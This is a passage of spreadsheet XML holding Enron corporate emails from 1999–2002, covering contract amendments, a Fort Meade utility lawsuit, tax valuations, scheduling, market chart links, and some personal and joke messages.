return to my attention at 1400 Smith Street, Hosuton, Texas 77002.  I will _x000D_
forward you an original for your files upon execution by ENA.  Thank you for _x000D_
your quick response._x000D_
_x000D_
Stacy Dickson_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
	"Catherine, Michelle" &lt;MCatherine@idahopower.com&gt;_x000D_
	05/15/2001 02:37 PM_x000D_
		 _x000D_
		 To: "Stacy E. Dickson (E-mail)" &lt;Stacy.E.Dickson@enron.com&gt;_x000D_
		 cc: _x000D_
		 Subject: FW: Amendment_x000D_
_x000D_
_x000D_
Stacy:_x000D_
Other than the two minor changes I made in the amendment, this looks ready_x000D_
for signature.  Will you email me back a final for execution or mail_x000D_
originals?  If mailing originals, please mail to my attention at 1221 West_x000D_
Idaho Street, Boise, ID  83702_x000D_
Thank you for handling this._x000D_
_x000D_
Michelle Catherine_x000D_
IDACORP Energy_x000D_
Contracts Administrator_x000D_
208/388-2333_x000D_
fax: 208/388-6905_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Stacy.E.Dickson@enron.com [mailto:Stacy.E.Dickson@enron.com]_x000D_
Sent: Monday, May 14, 2001 8:53 AM_x000D_
To: mcatherine@idahopower.com_x000D_
Cc: Ellen.Wallumrod@enron.com; Cyndie.Balfour-Flanagan@enron.com_x000D_
Subject: Amendment_x000D_
_x000D_
_x000D_
Michelle,_x000D_
_x000D_
Per our conversation, attached is a draft of an amendment to the Master_x000D_
Firm Purchase/Sale Agreement between IDACORP Energy Solutions, Inc. and_x000D_
Enron North America Corp.  which changes the confirming party to ENA._x000D_
_x000D_
Please call me at (713) 853-5705 or e-mail me with your comments._x000D_
_x000D_
Stacy Dickson_x000D_
_x000D_
(See attached file: IDACORP-amend to pur-sale agmt.doc)_x000D_
_x000D_
_x000D_
 - IDACORP-amend to pur-sale agmt.doc_x000D_
</t>
  </si>
  <si>
    <t>Tue, 20 Nov 2001 05:49:47 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'m..forney@enron.com', 'gerald.gilbert@enron.com'})</t>
  </si>
  <si>
    <t>AUSTIN PEAKER</t>
  </si>
  <si>
    <t>Gerald can you get with John on Monday and help him with coordinating an intraday agreement to supply imbalance gas to the Austin peakers._x000D_
_x000D_
Thanks.</t>
  </si>
  <si>
    <t>Mon, 26 Feb 2001 08:35:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Status of PG&amp;E Potential Sale of its Transmission</t>
  </si>
  <si>
    <t>Thanks very much.  Very interesting.  We'll be a lot more aligned once _x000D_
they've paid us..._x000D_
_x000D_
Best,_x000D_
Jeff</t>
  </si>
  <si>
    <t>Fri, 1 Sep 2000 02:16:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'vicki.sharp@enron.com', 'andrew.ralston@enron.com'})</t>
  </si>
  <si>
    <t>Fwd: FW: Fort Meade Privatization</t>
  </si>
  <si>
    <t xml:space="preserve">Attached are the BGE filings at the US District Court in Baltimore.  They are _x000D_
seeking injunctive and declaratory relief, both of which were summarily _x000D_
rejected by Judge Matsch in Denver, who is treating CSU's claim as an APA _x000D_
review. They are also making virtually identical legal claims as CSU - their _x000D_
central claim is that they have the exclusive right to operate electric and _x000D_
gas systems inside Fort Meade. BGE has also brought in the issue of state _x000D_
jurisdiction over other entities such as EFSI:  they cite an opinion letter _x000D_
from the General Counsel of the MD PSC as an "official decision"  - which it _x000D_
is not.  In any case, Randy Rich and I had  subsequent meeting with GC _x000D_
regarding that letter in which she "clarified" her position in various _x000D_
respects contrary to BGE's claims.  But I see that aspect of BGE's complaint _x000D_
as favorable from our standpoint - the District Court can rule on this issue _x000D_
instead of the state courts.  Vicki/Andrew, please let me know how you want _x000D_
to proceed.  I have a few ideas that we could discuss with whomever handles _x000D_
the case as outside counsel.    -Bob 3-3180_x000D_
---------------------- Forwarded by Robert Frank/NA/Enron on 09/01/2000 08:46 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
"Randall Rich" &lt;rrich@bracepatt.com&gt; on 09/01/2000 08:34:47 AM_x000D_
To: &lt;rfrank@enron.com&gt;_x000D_
cc: "Albert Krachman" &lt;akrachman@bracepatt.com&gt;, "Charles McNeish" _x000D_
&lt;cmcneish@bracepatt.com&gt; _x000D_
_x000D_
Subject: Fwd: FW: Fort Meade Privatization_x000D_
_x000D_
_x000D_
The BGE peititon is attached._x000D_
Received: from mcafee.bracepatt.com by bracepatt.com; Fri, 01 Sep 2000 _x000D_
08:27:05 -0500_x000D_
Received: FROM smtp1.bge.com BY mcafee.bracepatt.com ; Fri Sep 01 08:28:46 _x000D_
2000 -0500_x000D_
X-Proxy: keymaster.bracepatt.com protected_x000D_
Received: from ex-ge-r01.ge.cec (unverified) by smtp1.bge.com (Content _x000D_
Technologies SMTPRS 4.1.5) with ESMTP id &lt;T011405c44e61c71924@smtp1.bge.com&gt; _x000D_
for &lt;rrich@bracepatt.com&gt;; Fri, 1 Sep 2000 09:18:07 -0400_x000D_
Received: by smtp2.bge.com with Internet Mail Service (5.5.2650.21) id _x000D_
&lt;R97K9V2L&gt;; Fri, 1 Sep 2000 09:25:26 -0400_x000D_
Message-ID: &lt;82D020D6E0D8D311BD830004AC4CF564010F4B66@ex-ge-m05.ge.cec&gt;_x000D_
From: "Gahagan, Daniel P" &lt;Daniel.P.Gahagan@bge.com&gt;_x000D_
Sender: "Hertsgaard, Heidi L" &lt;Heidi.L.Hertsgaard@bge.com&gt;_x000D_
To: "'rrich@bracepatt.com'" &lt;rrich@bracepatt.com&gt;_x000D_
Subject: FW: Fort Meade Privatization_x000D_
Date: Fri, 1 Sep 2000 09:25:19 -0400_x000D_
MIME-Version: 1.0_x000D_
X-Mailer: Internet Mail Service (5.5.2650.21)_x000D_
Content-Type: multipart/mixed; _x000D_
boundary="----_=_NextPart_000_01C01418.12A70440"_x000D_
_x000D_
* BGE-Army Cover letter to Clerk.doc_x000D_
&gt; * BGE-Army Complaint.doc_x000D_
&gt; * BGE-Army Memorandum for Preliminary Injunction.doc_x000D_
&gt; * BGE-Army Memorandum Table of Contents.doc_x000D_
&gt; * BGE-Army Motion for Preliminary Injunction.doc_x000D_
&gt; * BGE-Army Declaration of M. Bay.doc_x000D_
&gt;_x000D_
&gt; I have also attached the GAO decision._x000D_
&gt;_x000D_
&gt;  &lt;&lt;BGE-Army  Cover letter to Clerk.DOC&gt;&gt;  &lt;&lt;BGE-Army Complaint.DOC&gt;&gt;_x000D_
&gt; &lt;&lt;BGE-Army Memorandum for Preliminary Injunction.DOC&gt;&gt;  &lt;&lt;BGE-Army_x000D_
&gt; Memorandum Table of Contents Authorities.DOC&gt;&gt;  &lt;&lt;BGE-Army Motion for_x000D_
&gt; Preliminary Injunction.DOC&gt;&gt;  &lt;&lt;BGE-Army  Declaration of M. Bay.DOC&gt;&gt;_x000D_
&gt; &lt;&lt;GAO Decision Case No 285209 080200.pdf&gt;&gt;_x000D_
&gt;_x000D_
&gt; Please forward these documents to Susan Miller._x000D_
&gt;_x000D_
&gt; Thanks._x000D_
&gt;_x000D_
&gt; Monika_x000D_
_x000D_
 - BGE-Army  Cover letter to Clerk.DOC_x000D_
 - BGE-Army Complaint.DOC_x000D_
 - BGE-Army Memorandum for Preliminary Injunction.DOC_x000D_
 - BGE-Army Memorandum Table of Contents Authorities.DOC_x000D_
 - BGE-Army Motion for Preliminary Injunction.DOC_x000D_
 - BGE-Army  Declaration of M. Bay.DOC_x000D_
 - GAO Decision Case No 285209 080200.pdf_x000D_
</t>
  </si>
  <si>
    <t>Fri, 21 Jul 2000 04:12:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'grant.zimmerman@enron.com'})</t>
  </si>
  <si>
    <t>Re: Associates PRC Meeting</t>
  </si>
  <si>
    <t xml:space="preserve">Here's my resume for your review._x000D_
_x000D_
_x000D_
_x000D_
Grant W. Zimmerman_x000D_
Enron Broadband Services_x000D_
Phone:  (713) 853-6210_x000D_
Fax:  (713) 646-8795_x000D_
_x000D_
_x000D_
_x000D_
	Sally Beck@ECT_x000D_
	07/21/00 09:34 AM_x000D_
		 _x000D_
		 To: Jennifer Bratton/Enron Communications@Enron Communications, Yvan _x000D_
Chaxel/Corp/Enron@ENRON, Justin Chola/Corp/Enron@ENRON, Shelly _x000D_
Friesenhahn/Enron Communications@Enron Communications, Cheryl _x000D_
Ingstad/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Nicole La/HOU/ECT@ECT, Erwin _x000D_
Landivar/SA/Enron@Enron, Nicole Palczer/Enron Communications@Enron _x000D_
Communications, Inderpal Singh/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Glenn _x000D_
Surowiec/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Miguel Vasquez/HOU/ECT@ECT, Jun _x000D_
Wang/Enron Communications@Enron Communications, Laura Wente/HOU/ECT@ECT, _x000D_
Grant Zimmerman/Enron Communications@Enron Communications_x000D_
		 cc: _x000D_
		 Subject: Associates PRC Meeting_x000D_
_x000D_
We have a new date - Monday, July 24th beginning at 9:00 am.  I will contact _x000D_
your supervisors after the PRC meeting to let them know the final results.  _x000D_
Your supervisor will give your performance review and will be able to _x000D_
summarize the feedback received through the PEP system during the review.  _x000D_
_x000D_
Thanks for providing your resumes.  I will feel more informed during the _x000D_
process.   _x000D_
</t>
  </si>
  <si>
    <t>Fri, 23 Mar 2001 09:04:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Help on cluster analysis</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Vince J Kaminski/HOU/ECT on 03/23/2001 _x000D_
05:05 PM ---------------------------_x000D_
_x000D_
_x000D_
Lance Cunningham@ENRON on 03/22/2001 02:45:24 PM_x000D_
To: Amitava Dhar/Corp/Enron@ENRON, Rakesh Bharati/NA/Enron@Enron, Martin _x000D_
Lin/Contractor/Enron Communications@Enron Communications_x000D_
cc: Stinson Gibner/HOU/ECT@ECT, Tanya Tamarchenko/HOU/ECT@ECT, Vasant _x000D_
Shanbhogue/HOU/ECT@ECT, Vkamins@enron.com, Ron McNamara/NA/Enron@Enron _x000D_
Subject: Help on cluster analysis_x000D_
_x000D_
Just wanted to pass a quick note to say thanks for all of your help that the _x000D_
three of you each gave me concerning cluster analysis.  Your help was _x000D_
invaluable .  As you may have been aware, we were performing the cluster _x000D_
analysis to define the commercial zones in ERCOT.  I only had a few days in _x000D_
which to learn the FASTCLUS procedure in SAS and prepare graphical views of _x000D_
the results.  _x000D_
_x000D_
Your assistance ensured that Enron was seen as one of three market leaders _x000D_
who had the capability to perform the analysis and cross check other market _x000D_
participants analysis.  We were the only participant who had the ability to _x000D_
graphically  display the results.  _x000D_
_x000D_
I was able to take the lead in a commercial meeting because of the data and _x000D_
results.  I just wanted you guys to know that I really appreciated your help._x000D_
_x000D_
I have attached a couple of files that show some of the results.  The _x000D_
presentation has the best overview._x000D_
_x000D_
  _x000D_
_x000D_
Best Regards,_x000D_
Lance_x000D_
</t>
  </si>
  <si>
    <t>Mon, 9 Apr 2001 13:49:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">Hi yourself,_x000D_
_x000D_
I swear you read my mind sometimes...I was just about to email you.  Anyway, things here are good and I am equally (if not more) excited about my visit.  I know the weather's been kind of funky the last week or so but I've been hearing the same rumours as you regarding a weekend warm-up.  Therefore, I'm still bringing my suit/beach clothes and will just make sure I've got some stuff in case it stays on the chilly side.  I'll also make sure to include some work-out clothes and Sunday attire ( I'm assuming a skirt or dress will work okay? )._x000D_
_x000D_
No worries about the need to study.  I've been go-go-go the last couple of weekends and would not mind at all having some down-time during the day for naps, lounging, walking, etc. while you study to your hearts content.  Honestly, we've got plenty of time to do things so it's no big deal._x000D_
_x000D_
My flight is supposed to arrive Thursday night at 7:00 and I leave at 3:40 Sunday afternoon ( I got direct flights this time so I won't be nearly as tired)._x000D_
_x000D_
Hope this week isn't too crazy for you...of course, if it is you'll be more than ready for a little R&amp;R._x000D_
_x000D_
Love,_x000D_
Susan_x000D_
_x000D_
_x000D_
   _x000D_
	Enron Capital &amp; Trade Resources Corp.  From:  Julie Gibson &lt;julieg@qualcomm.com&gt;                           04/09/2001 10:26 AM	_x000D_
		_x000D_
_x000D_
_x000D_
To:	Susan M Scott &lt;Susan.M.Scott@enron.com&gt;_x000D_
cc:	 _x000D_
Subject:	Hello!_x000D_
_x000D_
_x000D_
hi susan-_x000D_
_x000D_
how are you??  things are super crazy here, so wanted to drop you a note_x000D_
before it's suddenly thursday!  i am SO excited for your visit and a day_x000D_
off- i do have to warn you that my statistics mid-term got postponed_x000D_
(horrible and a relief at the same time) until the monday after easter, so_x000D_
i may have to study a bit over the weekend....i'll of course try to get it_x000D_
all done before you get in on thursday, though!  don't want to intrude on_x000D_
our beach time!_x000D_
_x000D_
the weather is odd right now- raining and chilly, but they're claiming it_x000D_
will warm up to 68 by friday- hopefully warmer.....so still definitely_x000D_
bring your suit, running shoes, and church clothes for Easter....._x000D_
_x000D_
what are your flight times?_x000D_
_x000D_
can't wait to see you!_x000D_
love,_x000D_
julie_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 6 Feb 2001 01:36:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Your a most welcome.   I would like to see the doc they sign to see if they  _x000D_
accepted our remarks._x000D_
_x000D_
Debra Perlingiere_x000D_
Enron North America Corp._x000D_
Legal Department_x000D_
1400 Smith Street, EB 3885_x000D_
Houston, Texas 77002_x000D_
dperlin@enron.com_x000D_
Phone 713-853-7658_x000D_
Fax  713-646-3490</t>
  </si>
  <si>
    <t>Thu, 3 Aug 2000 12:17:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Tax Valuations for YR2000</t>
  </si>
  <si>
    <t xml:space="preserve">FYI_x000D_
---------------------- Forwarded by Steven J Kean/HOU/EES on 08/03/2000 07:17 _x000D_
PM ---------------------------_x000D_
From: Gary Fitch@ENRON on 08/01/2000 02:03 PM_x000D_
To: Steven J Kean/HOU/EES@EES_x000D_
cc: Bill Donovan/EPSC/HOU/ECT@ECT _x000D_
Subject: Re: Tax Valuations for YR2000  _x000D_
_x000D_
Thanks Steve,  actual savings prior to allocation was $782,375   I miss _x000D_
calculated when I sent the memo._x000D_
_x000D_
_x000D_
_x000D_
	Steven J Kean@EES_x000D_
	08/01/2000 09:11 AM_x000D_
		_x000D_
		 To: Gary Fitch/HR/Corp/Enron@ENRON_x000D_
		 cc: _x000D_
		 Subject: Re: Tax Valuations for YR2000_x000D_
_x000D_
Congratulations!_x000D_
_x000D_
_x000D_
_x000D_
Gary Fitch@ENRON on 07/27/2000 12:02:47 PM_x000D_
To: Bill Donovan/EPSC/HOU/ECT@ECT_x000D_
cc: Steven J Kean/HOU/EES@EES _x000D_
Subject: Tax Valuations for YR2000_x000D_
_x000D_
Bill, we hit a home run this morning with HCAD.  They have agreed to take my _x000D_
reduced valuation on the Enron fleet.  A reduction of  $16,079,000 in taxable _x000D_
value.  This results in savings of $482,375.  That's not all, our allocation _x000D_
based on records for operations outside of the state of Texas resulted in _x000D_
additional savings of $1,559,638. Total savings to our 2000 budget will be _x000D_
$2,042,013.   _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 25 Apr 2001 02:04:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'dan.hyvl@enron.com', 'linda.noske@enron.com', 'jenny.helton@enron.com', 'kaye.ellis@enron.com'})</t>
  </si>
  <si>
    <t>Fwd: Fw: Humor</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; &gt;_x000D_
&gt; &gt; TOP TEN REDNECK COUNTRY SONGS OF ALL TIME_x000D_
&gt; &gt; *****************************************_x000D_
&gt; &gt; 10. Get Your Tongue Outta My Mouth 'Cause I'm Kissing You_x000D_
&gt; &gt;    Goodbye!_x000D_
&gt; &gt; 9. I Sold A Car To A Guy Who Stole My Girl, But It Don't_x000D_
&gt; &gt;    Run - So We're Even._x000D_
&gt; &gt; 8. I Haven't Gone To Bed With an Ugly Woman, But I've Sure_x000D_
&gt; &gt;    Woke Up With A Few_x000D_
&gt; &gt; 7. If I Had Shot You When I Wanted To, I'd Be Out By Now_x000D_
&gt; &gt; 6. You Gave Me Warm Fuzzies....Now I'm on Penicillin!_x000D_
&gt; &gt; 5. Her Teeth Was Stained, But Her Heart Was Pure_x000D_
&gt; &gt; 4. She Got The Ring And I Got The Finger_x000D_
&gt; &gt; 3. You're The Reason Our Kids Are So Ugly_x000D_
&gt; &gt; 2. I Still Miss You, Baby, But My Aim's Gettin' Better_x000D_
&gt; &gt; 1. She's A Lookin' Better After Every Beer_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt;_x000D_
</t>
  </si>
  <si>
    <t>Wed, 31 Jan 2001 23:51:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Mandell</t>
  </si>
  <si>
    <t>these two are right across the street_x000D_
_x000D_
http://www.har.com/search/condo/indexdetail.cfm?mlnum=526225_x000D_
_x000D_
http://www.har.com/search/condo/indexdetail.cfm?mlnum=527102</t>
  </si>
  <si>
    <t>Tue, 21 Dec 1999 22:52:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Unify Close Schedule</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Daren J Farmer/HOU/ECT on 12/22/99 06:50 _x000D_
AM ---------------------------_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Melissa K Ratnala                           12/15/99 09:28 AM_x000D_
	_x000D_
_x000D_
To: Brent A Price/HOU/ECT@ECT, Tommy J Yanowski/HOU/ECT@ECT, Brenda F _x000D_
Herod/HOU/ECT@ECT, Inja Chun/HOU/ECT@ECT, Dave Nommensen/HOU/ECT@ECT, Alan _x000D_
Conner/HOU/ECT@ECT, Paul F Poellinger/HOU/ECT@ECT, Scott _x000D_
Williamson/HOU/ECT@ECT, Jaikishore Bharathi/HOU/ECT@ECT, Jim Ogg/HOU/ECT@ECT, _x000D_
George Smith/HOU/ECT@ECT, Katherine L Kelly/HOU/ECT@ECT, Mary M _x000D_
Smith/HOU/ECT@ECT, Daren J Farmer/HOU/ECT@ECT, Jeffrey C Gossett/HOU/ECT@ECT, _x000D_
Mark Friedman/HOU/ECT@ECT, Gary Nelson/HOU/ECT@ECT, Rita Wynne/HOU/ECT@ECT, _x000D_
Mechelle Stevens/HOU/ECT@ECT, Angela Henn/HOU/ECT@ECT, O'Neal D _x000D_
Winfree/HOU/ECT@ECT, Darron C Giron/HOU/ECT@ECT, Melissa K _x000D_
Ratnala/HOU/ECT@ECT, Susan Harrison/HOU/ECT@ECT, Kristen J _x000D_
Hanson/HOU/ECT@ECT, Cynthia Hakemack/HOU/ECT@ECT, Troy Klussmann/HOU/ECT@ECT, _x000D_
Julia Sengele/HOU/ECT@ECT, Lisa B Cousino/HOU/ECT@ECT, Stephen -ECT- _x000D_
Schwarz/HOU/ECT@ECT, Joe Villela/FGT/Enron@Enron, Kenneth M _x000D_
Harmon/HOU/ECT@ECT, Regan M Smith/HOU/ECT@ECT, Robert Superty/HOU/ECT@ECT, _x000D_
Scotty Gilbert/HOU/ECT@ECT, Edward Terry/HOU/ECT@ECT, Randall L _x000D_
Gay/HOU/ECT@ECT, John Valdes/HOU/ECT@ECT, Lisa Csikos/HOU/ECT@ECT, David _x000D_
Baumbach/HOU/ECT@ECT, Bryan Hull/HOU/ECT@ECT, Judy Barnes/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Unify Close Schedule_x000D_
_x000D_
The following is the close schedule for this coming month (year-end.)  Please _x000D_
keep in the mind the following key times...._x000D_
_x000D_
Unify to Sitara bridge back 1:45p.m. Thursday, Dec 30th (all errors must be _x000D_
clear by this time)_x000D_
Mass draft at 6p.m. Thursday evening, Dec 30th._x000D_
Accrual process begins Friday morning, Dec 31st at 6:30a.m.  (If your group _x000D_
impacts the accrual, please ensure that the necessary people are available _x000D_
for support if needed, as this is an Enron holiday.)_x000D_
_x000D_
Please feel free to contact me should you have any questions._x000D_
Thank you, Melissa x35615_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 11 Jan 2002 04:49:59 -0800 (PST)</t>
  </si>
  <si>
    <t>dail ngas &amp; crude charts 1/11</t>
  </si>
  <si>
    <t xml:space="preserve">The information contained herein is based on sources that we believe to be_x000D_
reliable, but we do not represent that it is accurate or complete.  Nothing_x000D_
contained herein should be considered as an offer to sell or a solicitation_x000D_
of an offer to buy any financial instruments discussed herein.  Any_x000D_
opinions expressed herein are solely those of the author.  As such, they_x000D_
may differ in material respects from those of, or expressed or published by_x000D_
on behalf of Carr Futures or its officers, directors, employees or_x000D_
affiliates.  ? 2001 Carr Futures_x000D_
_x000D_
_x000D_
The charts are now available on the web by clicking on the hot link(s)_x000D_
contained in this email. If for any reason you are unable to receive the_x000D_
charts via the web, please contact me via email and I will email the charts_x000D_
to you as attachments._x000D_
_x000D_
_x000D_
Crude     http://www.carrfut.com/research/Energy1/crude63.pdf_x000D_
Natural Gas     http://www.carrfut.com/research/Energy1/ngas63.pdf_x000D_
_x000D_
_x000D_
Feb. WTI/Brent Spread_x000D_
http://www.carrfut.com/research/Energy1/clg-qog.pdf_x000D_
Feb Heat Crack     http://www.carrfut.com/research/Energy1/heatcrack.pdf_x000D_
Feb Gas Crack     http://www.carrfut.com/research/Energy1/gascrack.pdf_x000D_
Feb Gas/Heat Spread     http://www.carrfut.com/research/Energy1/hug-hog.pdf_x000D_
June Gas/Heat Spread_x000D_
http://www.carrfut.com/research/Energy1/HUM-HOM.pdf_x000D_
March Gas/Heat Spread_x000D_
http://www.carrfut.com/research/Energy1/HUH-HOH.pdf_x000D_
Feb/May Unlead Spread_x000D_
http://www.carrfut.com/research/Energy1/HUG-HUK.pdf_x000D_
Feb/July Crude oil Spread_x000D_
http://www.carrfut.com/research/Energy1/CLG-CLN.pdf_x000D_
_x000D_
Nat Gas Strip Matrix_x000D_
http://www.carrfut.com/research/Energy1/StripmatrixNG63.pdf_x000D_
Nat Gas Spread Matrix_x000D_
http://www.carrfut.com/research/Energy1/SpreadmatrixNG63.pdf_x000D_
_x000D_
Crude and Products Spread Matrix_x000D_
http://www.carrfut.com/research/Energy1/SpreadmatrixCL63.pdf_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 24 Mar 2000 10:26:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Power Plants</t>
  </si>
  <si>
    <t xml:space="preserve">pls print this and hand it to me.  I tried sending it directly to the _x000D_
printer, but couldn't tell if it went.  Thanks. FD_x000D_
---------------------- Forwarded by Drew Fossum/ET&amp;S/Enron on 03/24/2000 _x000D_
06:25 PM ---------------------------_x000D_
_x000D_
_x000D_
"George Briden" &lt;gbriden.snakehill@worldnet.att.net&gt; on 03/24/2000 05:10:46 PM_x000D_
To: "Drew Fossum" &lt;Drew.Fossum@enron.com&gt;_x000D_
cc:  _x000D_
_x000D_
Subject: Power Plants_x000D_
_x000D_
_x000D_
_x000D_
Drew;_x000D_
I've been working with Jeff Fawcett on two projects._x000D_
Two clients are involved._x000D_
I've heard nothing from TW on either.? One project (Wikieup, AZ) is  hot to _x000D_
go._x000D_
Can you kick this guy for me (and TW)?_x000D_
I've been calling JF with?no response._x000D_
Let me know if I can assist you in any way._x000D_
Best regards,_x000D_
GB_x000D_
?_x000D_
 - George Briden.vcf_x000D_
</t>
  </si>
  <si>
    <t>Mon, 28 Feb 2000 08:43:00 -0800 (PST)</t>
  </si>
  <si>
    <t>New Pooling Points</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
 The two new pooling points are as follows:   1).  Aqua Dulce Pool   = 987349_x000D_
            _x000D_
            2):  Corpus Christi Pool  =  987350</t>
  </si>
  <si>
    <t>Fri, 27 Apr 2001 03:43:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: #592053, #592055</t>
  </si>
  <si>
    <t xml:space="preserve">592053 - unit name is Las Vegas Cogeneration_x000D_
_x000D_
592055 - unit name is Grays Harbor_x000D_
_x000D_
I've added these in the comments section of the deals._x000D_
_x000D_
Thanks,_x000D_
Kate_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Kimberly Hundl@ENRON_x000D_
04/27/2001 07:32 AM_x000D_
To: Kate Symes/PDX/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: #592053, #592055_x000D_
_x000D_
Hi Kate,_x000D_
I need the unit names for these two unit contingent deals so i can confirm _x000D_
them._x000D_
Thanks!_x000D_
Kim_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 16 Nov 2000 02:02:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'kevin.rhodes@enron.com', 'brent.price@enron.com', 'joel.henenberg@enron.com', 'james.new@enron.com', 'mike.jordan@enron.com', 'peggy.hedstrom@enron.com', 'scott.earnest@enron.com', 'andrew.cornfield@enron.com', 'd.hall@enron.com', 'jeffrey.gossett@enron.com', 'sheila.glover@enron.com', 'sally.beck@enron.com', 'leslie.reeves@enron.com', 'scott.mills@enron.com', 'david.hardy@enron.com', 'brenda.herod@enron.com', 'howard.carter@enron.com', 'louis.colarusso@enron.com', 'bob.hall@enron.com'})</t>
  </si>
  <si>
    <t>weekly log summary</t>
  </si>
  <si>
    <t xml:space="preserve">  Please call if you have any questions - 713 853 9123.</t>
  </si>
  <si>
    <t>Fri, 16 Mar 2001 07:32:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Subject email "Password Security Notice"</t>
  </si>
  <si>
    <t>We regret the recent response to the subject email "Password Security Notice" _x000D_
that you may have received.  The particular email was inappropriate and the _x000D_
ISC has therefore taken immediate disciplinary action against the individual _x000D_
responsible._x000D_
_x000D_
Allan Sommer_x000D_
Integrated Solutions Center (ISC)</t>
  </si>
  <si>
    <t>Sun, 10 Dec 2000 22:08:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Fri, 23 Feb 2001 02:08:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'marc.eichmann@enron.com'})</t>
  </si>
  <si>
    <t>Marc,_x000D_
_x000D_
Unfortunately, today is not going to work for the revenue model for mid &amp; _x000D_
back office services meeting.  How about this coming Monday, Feb 26 from 1:00 _x000D_
- 2:30 pm?  I have penciled in that time for Sally, Mary Solmonson &amp; James _x000D_
Scribner.  Please let me know if that will work for you._x000D_
_x000D_
Thanks,_x000D_
Patti x39106</t>
  </si>
  <si>
    <t>Thu, 26 Oct 2000 02:16:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jkmurphy@jonesday.com'})</t>
  </si>
  <si>
    <t>Re: Environmental Due Diligence Questions</t>
  </si>
  <si>
    <t xml:space="preserve">Here are the answers to your latest questions.  Again, please give us a call _x000D_
if you have any more questions.  Thanks!_x000D_
Ben Rogers_x000D_
</t>
  </si>
  <si>
    <t>Fri, 29 Sep 2000 03:21:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Outline of TW Options Program</t>
  </si>
  <si>
    <t xml:space="preserve">I've redlined the outline to address what I believe is the most important _x000D_
risk you guys will face out there:  the risk that FERC will listen to your _x000D_
presentation and conclude that the embedded optionality that some pipelines _x000D_
are currently offering in transport contracts is a negotiated term and _x000D_
condition and therefore must be stopped.  I think we need to tailor the _x000D_
presentation and filing to minimize the chance that FERC will take away _x000D_
flexibility we think we now have (i.e., the flexibility to embed shipper puts _x000D_
in transport contracts).   Even if the TW approach on unbundled options goes _x000D_
nowhere, several of the strategies we may want to implement next year depend _x000D_
on continued ability to sell embedded options.   Susan, Shelley,a nd MKM, I _x000D_
still think it is a good idea to push this proposal, but am concerned that _x000D_
FERC might squirrel and go the opposite direction we are trying to push _x000D_
them.  Your thoughts?  DF_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
     _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Susan Scott_x000D_
09/28/2000 03:27 PM_x000D_
To: Nancy Bagot/OTS/Enron@ENRON_x000D_
cc: Shelley Corman/ET&amp;S/Enron@ENRON, Jeffery Fawcett/ET&amp;S/Enron@ENRON, Drew _x000D_
Fossum@ENRON, Mary Kay Miller/ET&amp;S/Enron@ENRON, Glen Hass/ET&amp;S/Enron@ENRON _x000D_
_x000D_
Subject: Outline of TW Options Program_x000D_
_x000D_
Nancy, I've prepared the attached outline in response to FERC Staff's request _x000D_
that we provide "something in writing."  This is basically just a description _x000D_
of our proposal.  I've tried to keep it brief so that staff members are not _x000D_
reading while we're trying to talk to them.  It should be enough information _x000D_
to raise a lot of questions._x000D_
_x000D_
Please wait until Shelley or I give you the go-ahead to pass this along to _x000D_
the relevant Commission people; I'd like to give the other addressees the _x000D_
opportunity to comment on this to the extent possible.  _x000D_
_x000D_
Everyone else:  please give me your comments ASAP as Nancy has been asked to _x000D_
provide something to them tomorrow._x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 14 Dec 1999 22:12:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'kwon@haas.berkeley.edu', 'brodie@haas.berkeley.edu', 'clee@haas.berkeley.edu', 'davis@haas.berkeley.edu', 'mendelso@haas.berkeley.edu', 'jkelly@fairisaac.com', 'dasovich@haas.berkeley.edu', 'michael@eeg.com', 'kupiecki@haas.berkeley.edu', 'kazi@haas.berkeley.edu', 'chris_neale@gap.com', 'esarte@haas.berkeley.edu', 'hudacko@haas.berkeley.edu', 'dshah@haas.berkeley.edu', 'devroede@haas.berkeley.edu'})</t>
  </si>
  <si>
    <t>germany</t>
  </si>
  <si>
    <t>In my sniffling, sneezing, coughing, stuffy head, fever state I did not_x000D_
